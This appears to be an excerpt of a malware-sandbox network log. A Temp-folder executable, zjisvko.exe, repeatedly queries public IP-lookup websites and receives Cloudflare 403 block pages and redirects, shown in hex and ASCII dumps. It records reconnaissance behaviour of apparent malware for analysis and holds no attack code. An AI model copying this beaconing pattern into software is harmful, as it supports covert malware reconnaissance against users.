                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    15192.168.11.3049827104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.736737013 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880258083 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:44 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=o27P_8.1Q7o_KBrL5CpxRxlGZhSGfUovhellNCBPt3U-1728999569-1.0.1.1-Ps86dzFA2ySE4s7AvFNH51Q6UAWlflAmCgdZKT8Numd2dOljmq10iyMEuHTieeL1xcUuUExvZhRLWi35mSbwcg; path=/; expires=Tue, 15-Oct-24 14:09:29 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30372f3ca1746d-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880287886 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880307913 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:29.880330086 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 32 66 33 63 61 31 37 34 36 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d30372f3ca1746d</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    16192.168.11.3049831104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.064106941 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.207948923 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:48 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=5yMpV.In6xs.yigWY4VWH1iNK5oS7aiKe6eBOL4Xifk-1728999573-1.0.1.1-JnW_97jN86t2Hc2gjpQD.0gxMboUGc9PRHzEU1IF6NIdDzzqtTmgEwYXj_toZwGIKC1vOLcnLnPgpNmiv5kzRQ; path=/; expires=Tue, 15-Oct-24 14:09:33 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037440ce9225d-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.207993031 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208008051 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:33.208139896 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 34 34 30 63 65 39 32 32 35 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3037440ce9225d</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    17192.168.11.3049833172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.361063004 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:34.503163099 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:34 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:34 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQGlqW6wbV57IF3umxusoDZmM9cRVp53Yq0V8sl3dEuz9QMm6BoLb%2BJvOMcHXYKLzDGslarHNq9jPbVFQADQmAw9KLbvDW8EK%2BoSbWp5GY%2BwaUchK2VI34yPjKm0I7pD4QnYbkXC0PIS4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30374c280d31f6-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    18192.168.11.3049834104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.656472921 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819214106 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:39:50 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=qs7qpzbLNrRljCKaFh3TJfJ7sOl4FZgA5t_fqo4mAu4-1728999575-1.0.1.1-3H_7CHI.JeMpVjHLXKVzdWV1BdzwWuf7TMPlfa3ZEl1y_8eVvOtwk8EAFv1X49mkRrzgYTtOsu_tCYuV4MJQ5w; path=/; expires=Tue, 15-Oct-24 14:09:35 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037543adfa65f-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819267035 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.819942951 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:35.820050001 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 37 35 34 33 61 64 66 61 36 35 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3037543adfa65f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    19192.168.11.3049838104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.240591049 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:38.405069113 CEST861INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:38 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cw7DuiWfQkPd6feOLkyAh%2F8%2B%2BK84Rrq9pJH7yklvmLD87kJtVeLe29A5glgFk39ZUtUabhwCWLkaGApLXatlDbQ5%2BgD7%2Bv0QoMVED4meVS95L%2BJFr9ZFwbaYp8zFGcr8JxaaRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037646bf69aeb-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    20192.168.11.3049842172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.562753916 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:40.723990917 CEST880INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:40 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMRZoW6a%2B8EqcRN1L6ACCyyr2fn82iKRj3ADKbkQ9emnTMLRLzCUqSoY3CAQd7nke6FI%2B1kYpRQOjbfZ5uk%2BgpkLXQOr1G1nxM0xWgnHVqxnQqz6pTAhujXNgmhS9khdUS3y1Kf%2FSBBq6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d303772e8e2336a-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
